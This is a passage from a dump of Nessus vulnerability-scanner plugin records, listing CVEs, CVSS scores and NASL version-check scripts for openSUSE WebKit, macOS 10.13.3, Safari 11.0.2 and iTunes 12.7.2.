2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libjavascriptcoregtk-4_0-18-2.20.3-11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-2.20.3-11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libwebkit2gtk-4_0-37-2.20.3-11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libwebkit2gtk-4_0-37-debuginfo-2.20.3-11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libwebkit2gtk3-lang-2.20.3-11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"typelib-1_0-JavaScriptCore-4_0-2.20.3-11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"typelib-1_0-WebKit2-4_0-2.20.3-11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"typelib-1_0-WebKit2WebExtension-4_0-2.20.3-11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"webkit-jsc-4-2.20.3-11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"webkit-jsc-4-debuginfo-2.20.3-11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"webkit2gtk-4_0-injected-bundles-2.20.3-11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"webkit2gtk-4_0-injected-bundles-debuginfo-2.20.3-11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"webkit2gtk3-debugsource-2.20.3-11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"webkit2gtk3-devel-2.20.3-11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"webkit2gtk3-plugin-process-gtk2-2.20.3-11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"webkit2gtk3-plugin-process-gtk2-debuginfo-2.20.3-11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"libjavascriptcoregtk-4_0-18-32bit-2.20.3-11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-32bit-2.20.3-11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"libwebkit2gtk-4_0-37-32bit-2.20.3-11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"libwebkit2gtk-4_0-37-debuginfo-32bit-2.20.3-11.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libjavascriptcoregtk-4_0-18 / libjavascriptcoregtk-4_0-18-32bit / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-22T14:32:57", "description": "The version of Apple iOS running on the mobile device is prior to 11.2.5. It is, therefore, affected by multiple vulnerabilities as referenced in the HT208463 advisory.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-01-25T00:00:00", "type": "nessus", "title": "Apple iOS < 11.2.5 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4082", "CVE-2018-4085", "CVE-2018-4086", "CVE-2018-4087", "CVE-2018-4088", "CVE-2018-4089", "CVE-2018-4090", "CVE-2018-4092", "CVE-2018-4093", "CVE-2018-4094", "CVE-2018-4095", "CVE-2018-4096", "CVE-2018-4100", "CVE-2018-4109"], "modified": "2022-06-21T00:00:00", "cpe": ["cpe:/o:apple:iphone_os"], "id": "APPLE_IOS_1125_CHECK.NBIN", "href": "https://www.tenable.com/plugins/nessus/106308", "sourceData": "Binary data apple_ios_1125_check.nbin", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:27:08", "description": "The version of Apple iOS running on the mobile device is prior to 11.2.5. It is, therefore, affected by multiple vulnerabilities as referenced in the HT208463 advisory.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-04-17T00:00:00", "type": "nessus", "title": "Apple iOS < 11.2.5 Multiple Vulnerabilities (APPLE-SA-2018-1-23-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4088", "CVE-2018-4096", "CVE-2018-4100", "CVE-2018-4094", "CVE-2018-4087", "CVE-2018-4095", "CVE-2018-4109", "CVE-2018-4090", "CVE-2018-4092", "CVE-2018-4082", "CVE-2018-4093", "CVE-2018-4085", "CVE-2018-4086", "CVE-2018-4089"], "modified": "2019-04-17T00:00:00", "cpe": ["cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:*"], "id": "700546.PRM", "href": "https://www.tenable.com/plugins/nnm/700546", "sourceData": "Binary data 700546.prm", "cvss": {"score": 9.3, "vector": "CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:27:14", "description": "The remote host is running a version of Mac OS X that is 10.13.x prior to 10.13.3. It is, therefore, affected by multiple vulnerabilities in the following components :\n\n - Audio\n - curl\n - IOHIDFamily\n - Kernel\n - LinkPresentation\n - QuartzCore\n - Sandbox\n - Security\n - WebKit\n - Wi-Fi\n\nNote that successful exploitation of the most serious issues can result in arbitrary code execution.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-04-10T00:00:00", "type": "nessus", "title": "macOS 10.13.x < 10.13.3 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-8817", "CVE-2018-4088", "CVE-2018-4096", "CVE-2018-4091", "CVE-2018-4100", "CVE-2018-4094", "CVE-2018-4090", "CVE-2018-4092", "CVE-2018-4082", "CVE-2018-4093", "CVE-2018-4085", "CVE-2018-4098", "CVE-2018-4086", "CVE-2018-4089", "CVE-2018-4097", "CVE-2018-4083", "CVE-2018-4084"], "modified": "2019-04-10T00:00:00", "cpe": ["cpe:2.3:o:apple:mac_os_x:*:*:*:*:*:*:*:*"], "id": "700514.PRM", "href": "https://www.tenable.com/plugins/nnm/700514", "sourceData": "Binary data 700514.prm", "cvss": {"score": 10, "vector": "CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-22T15:38:20", "description": "The version of Apple iOS running on the mobile device is prior to 11.2. It is, therefore, affected by multiple vulnerabilities as referenced in the HT208334 advisory.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-12-07T00:00:00", "type": "nessus", "title": "Apple iOS < 11.2 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-13080", "CVE-2017-13833", "CVE-2017-13847", "CVE-2017-13855", "CVE-2017-13856", "CVE-2017-13860", "CVE-2017-13861", "CVE-2017-13862", "CVE-2017-13865", "CVE-2017-13866", "CVE-2017-13867", "CVE-2017-13868", "CVE-2017-13869", "CVE-2017-13870", "CVE-2017-13874", "CVE-2017-13876", "CVE-2017-13879", "CVE-2017-13880", "CVE-2017-13884", "CVE-2017-13885", "CVE-2017-13888", "CVE-2017-13891", "CVE-2017-13904", "CVE-2017-13905", "CVE-2017-2411", "CVE-2017-5754", "CVE-2017-7151", "CVE-2017-7152", "CVE-2017-7153", "CVE-2017-7154", "CVE-2017-7156", "CVE-2017-7157", "CVE-2017-7160", "CVE-2017-7162", "CVE-2017-7164", "CVE-2017-7165", "CVE-2017-7171", "CVE-2017-7172", "CVE-2017-7173"], "modified": "2022-06-21T00:00:00", "cpe": ["cpe:/o:apple:iphone_os"], "id": "APPLE_IOS_112_CHECK.NBIN", "href": "https://www.tenable.com/plugins/nessus/105075", "sourceData": "Binary data apple_ios_112_check.nbin", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:34:12", "description": "The remote host is running a version of Mac OS X that is 10.13.x prior to 10.13.3. It is, therefore, affected by multiple vulnerabilities in the following components :\n\n - Audio\n - curl\n - IOHIDFamily\n - Kernel\n - LinkPresentation\n - QuartzCore\n - Sandbox\n - Security\n - WebKit\n - Wi-Fi\n\nNote that successful exploitation of the most serious issues can result in arbitrary code execution.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-01-24T00:00:00", "type": "nessus", "title": "macOS 10.13.x < 10.13.3 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-13889", "CVE-2017-5705", "CVE-2017-5708", "CVE-2017-7830", "CVE-2017-8816", "CVE-2017-8817", "CVE-2018-4082", "CVE-2018-4083", "CVE-2018-4084", "CVE-2018-4085", "CVE-2018-4086", "CVE-2018-4088", "CVE-2018-4089", "CVE-2018-4090", "CVE-2018-4091", "CVE-2018-4092", "CVE-2018-4093", "CVE-2018-4094", "CVE-2018-4096", "CVE-2018-4097", "CVE-2018-4098", "CVE-2018-4100", "CVE-2018-4147", "CVE-2018-4169", "CVE-2018-4189"], "modified": "2019-06-19T00:00:00", "cpe": ["cpe:/o:apple:mac_os_x", "cpe:/o:apple:macos"], "id": "MACOS_10_13_3.NASL", "href": "https://www.tenable.com/plugins/nessus/106296", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(106296);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2019/06/19 15:17:43\");\n\n script_cve_id(\n \"CVE-2017-13889\",\n \"CVE-2017-5705\",\n \"CVE-2017-5708\",\n \"CVE-2017-7830\",\n \"CVE-2017-8816\",\n \"CVE-2017-8817\",\n \"CVE-2018-4082\",\n \"CVE-2018-4083\",\n \"CVE-2018-4084\",\n \"CVE-2018-4085\",\n \"CVE-2018-4086\",\n \"CVE-2018-4088\",\n \"CVE-2018-4089\",\n \"CVE-2018-4090\",\n \"CVE-2018-4091\",\n \"CVE-2018-4092\",\n \"CVE-2018-4093\",\n \"CVE-2018-4094\",\n \"CVE-2018-4096\",\n \"CVE-2018-4097\",\n \"CVE-2018-4098\",\n \"CVE-2018-4100\",\n \"CVE-2018-4147\",\n \"CVE-2018-4169\",\n \"CVE-2018-4189\"\n );\n script_bugtraq_id(\n 101832,\n 101917,\n 101921,\n 101998,\n 102057,\n 102772,\n 102775,\n 102778,\n 102782,\n 102785,\n 103330\n );\n script_name(english:\"macOS 10.13.x < 10.13.3 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the version of Mac OS X / macOS.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a macOS update that fixes multiple security\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of Mac OS X that is 10.13.x\nprior to 10.13.3. It is, therefore, affected by multiple\nvulnerabilities in the following components :\n\n - Audio\n - curl\n - IOHIDFamily\n - Kernel\n - LinkPresentation\n - QuartzCore\n - Sandbox\n - Security\n - WebKit\n - Wi-Fi\n\nNote that successful exploitation of the most serious issues can\nresult in arbitrary code execution.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT208465\");\n # https://lists.apple.com/archives/security-announce/2018/Jan/msg00001.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?19644313\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to macOS version 10.13.3 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-4189\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/01/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/01/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:macos\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"os_fingerprint.nasl\");\n script_require_ports(\"Host/MacOSX/Version\", \"Host/OS\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nos = get_kb_item(\"Host/MacOSX/Version\");\nif (!os)\n{\n os = get_kb_item_or_exit(\"Host/OS\");\n if (\"Mac OS X\" >!< os) audit(AUDIT_OS_NOT, \"macOS / Mac OS X\");\n\n c = get_kb_item(\"Host/OS/Confidence\");\n if (c <= 70) exit(1, \"Can't determine the host's OS with sufficient confidence.\");\n}\nif (!os) audit(AUDIT_OS_NOT, \"macOS / Mac OS X\");\n\nmatches = pregmatch(pattern:\"Mac OS X ([0-9]+(\\.[0-9]+)+)\", string:os);\nif (empty_or_null(matches)) exit(1, \"Failed to parse the macOS / Mac OS X version ('\" + os + \"').\");\n\nversion = matches[1];\nfixed_version = \"10.13.3\";\n\nif (version !~\"^10\\.13($|[^0-9])\")\n audit(AUDIT_OS_NOT, \"macOS 10.13.x\");\n\nif (ver_compare(ver:version, fix:'10.13.3', strict:FALSE) == -1)\n{\n security_report_v4(\n port:0,\n severity:SECURITY_HOLE,\n extra:\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_version +\n '\\n'\n );\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, \"macOS / Mac OS X\", version);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-12T15:47:42", "description": "The version of Apple Safari installed on the remote macOS or Mac OS X host is prior to 11.0.2. It is, therefore, affected by multiple vulnerabilities as described in the HT208324 security advisory.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-01-03T00:00:00", "type": "nessus", "title": "macOS : Apple Safari < 11.0.2 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-13856", "CVE-2017-13866", "CVE-2017-13870", "CVE-2017-7156", "CVE-2017-7157", "CVE-2017-7160"], "modified": "2019-11-08T00:00:00", "cpe": ["cpe:/a:apple:safari"], "id": "MACOSX_SAFARI11_0_2.NASL", "href": "https://www.tenable.com/plugins/nessus/105515", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105515);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/11/08\");\n\n script_cve_id(\n \"CVE-2017-7156\",\n \"CVE-2017-7157\",\n \"CVE-2017-7160\",\n \"CVE-2017-13856\",\n \"CVE-2017-13866\",\n \"CVE-2017-13870\"\n );\n script_bugtraq_id(102181);\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2017-12-13-5\");\n\n script_name(english:\"macOS : Apple Safari < 11.0.2 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the Safari version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote macOS or Mac OS X host is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apple Safari installed on the remote macOS or Mac OS X\nhost is prior to 11.0.2. It is, therefore, affected by multiple\nvulnerabilities as described in the HT208324 security advisory.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT208324\");\n # https://lists.apple.com/archives/security-announce/2017/Dec/msg00007.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?752a7790\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apple Safari version 11.0.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-7160\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/12/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:safari\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_Safari31.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/MacOSX/Version\", \"MacOSX/Safari/Installed\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nos = get_kb_item(\"Host/MacOSX/Version\");\nif (!os) audit(AUDIT_OS_NOT, \"Mac OS X or macOS\");\n\nif (!preg(pattern:\"Mac OS X 10\\.(11|12|13)([^0-9]|$)\", string:os))\n{\n audit(AUDIT_OS_NOT, \"Mac OS X El Capitan 10.11 / macOS Sierra 10.12 / macOS High Sierra 10.13\");\n} \n\ninstalled = get_kb_item_or_exit(\"MacOSX/Safari/Installed\", exit_code:0);\npath = get_kb_item_or_exit(\"MacOSX/Safari/Path\", exit_code:1);\nversion = get_kb_item_or_exit(\"MacOSX/Safari/Version\", exit_code:1);\n\nfixed_version = \"11.0.2\";\n\nif (ver_compare(ver:version, fix:fixed_version, strict:FALSE) == -1)\n{\n report = report_items_str(\n report_items:make_array(\n \"Path\", path,\n \"Installed version\", version,\n \"Fixed version\", fixed_version\n ),\n ordered_fields:make_list(\"Path\", \"Installed version\", \"Fixed version\")\n );\n security_report_v4(port:0, severity:SECURITY_WARNING, extra:report);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, \"Safari\", version, path);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:27:12", "description": "The version of Apple Safari installed on the remote host is prior to 11.0.2. It is, therefore, affected by multiple vulnerabilities as described in the HT208324 security advisory.", "cvss3": {"score": 7.1, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L"}, "published": "2019-04-08T00:00:00", "type": "nessus", "title": "Apple Safari < 11.0.2 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-13856", "CVE-2017-13866", "CVE-2017-13870", "CVE-2017-7156", "CVE-2017-7157", "CVE-2017-7160"], "modified": "2019-04-08T00:00:00", "cpe": ["cpe:2.3:a:apple:safari:*:*:*:*:*:*:*:*"], "id": "700501.PRM", "href": "https://www.tenable.com/plugins/nnm/700501", "sourceData": "Binary data 700501.prm", "cvss": {"score": 6.8, "vector": "CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-13T14:02:22", "description": "The version of Apple iTunes installed on the remote Windows host is prior to 12.7.2. It is, therefore, affected by multiple vulnerabilities in webkit as referenced in the HT208326 advisory.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-01-08T00:00:00", "type": "nessus", "title": "Apple iTunes < 12.7.2 WebKit Multiple Vulnerabilities (credentialed check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-13856", "CVE-2017-13866", "CVE-2017-13870", "CVE-2017-7156", "CVE-2017-7157", "CVE-2017-7160"], "modified": "2019-11-08T00:00:00", "cpe": ["cpe:/a:apple:itunes"], "id": "ITUNES_12_7_2.NASL", "href": "https://www.tenable.com/plugins/nessus/105651", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105651);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/11/08\");\n\n script_cve_id(\n \"CVE-2017-7156\",\n \"CVE-2017-7157\",\n \"CVE-2017-7160\",\n \"CVE-2017-13856\",\n \"CVE-2017-13866\",\n \"CVE-2017-13870\"\n );\n script_bugtraq_id(102181, 102192);\n\n script_name(english:\"Apple iTunes < 12.7.2 WebKit Multiple Vulnerabilities (credentialed check)\");\n script_summary(english:\"Checks the version of iTunes on Windows.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application installed on the remote host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apple iTunes installed on the remote Windows host is\nprior to 12.7.2. It is, therefore, affected by multiple vulnerabilities \nin webkit as referenced in the HT208326 advisory.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT208326\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apple iTunes version 12.7.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-7160\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/12/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:itunes\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"itunes_detect.nasl\");\n script_require_keys(\"installed_sw/iTunes Version\", \"SMB/Registry/Enumerated\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\n\n# Ensure this is Windows\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\n\napp_info = vcf::get_app_info(app:\"iTunes Version\", win_local:TRUE);\n\nconstraints = [{\"fixed_version\" : \"12.7.2\"}];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-12T15:50:49", "description": "The version of Apple iTunes installed on the remote Windows host is prior to 12.7.2. It is, therefore, affected by multiple vulnerabilities in webkit as referenced in the HT208326 advisory.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-01-08T00:00:00", "type": "nessus", "title": "Apple iTunes < 12.7.2 WebKit Multiple Vulnerabilities (uncredentialed check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-13856", "CVE-2017-13866", "CVE-2017-13870", "CVE-2017-7156", "CVE-2017-7157", "CVE-2017-7160"], "modified": "2019-11-08T00:00:00", "cpe": ["cpe:/a:apple:itunes"], "id": "ITUNES_12_7_2_BANNER.NASL", "href": "https://www.tenable.com/plugins/nessus/105652", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105652);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/11/08\");\n\n script_cve_id(\n \"CVE-2017-7156\",\n \"CVE-2017-7157\",\n \"CVE-2017-7160\",\n \"CVE-2017-13856\",\n \"CVE-2017-13866\",\n \"CVE-2017-13870\"\n );\n script_bugtraq_id(102181, 102192);\n\n script_name(english:\"Apple iTunes < 12.7.2 WebKit Multiple Vulnerabilities (uncredentialed check)\");\n script_summary(english:\"Checks the version of iTunes on Windows.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application installed on the remote host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apple iTunes installed on the remote Windows host is\nprior to 12.7.2. It is, therefore, affected by multiple vulnerabilities\nin webkit as referenced in the HT208326 advisory.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT208326\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apple iTunes version 12.7.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-7160\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/12/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:itunes\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Peer-To-Peer File Sharing\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"itunes_sharing.nasl\");\n script_require_keys(\"iTunes/sharing\");\n script_require_ports(\"Services/www\", 3689);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nport = get_http_port(default:3689, embedded:TRUE, ignore_broken:TRUE);\n\nget_kb_item_or_exit(\"iTunes/\" + port + \"/enabled\");\n\ntype = 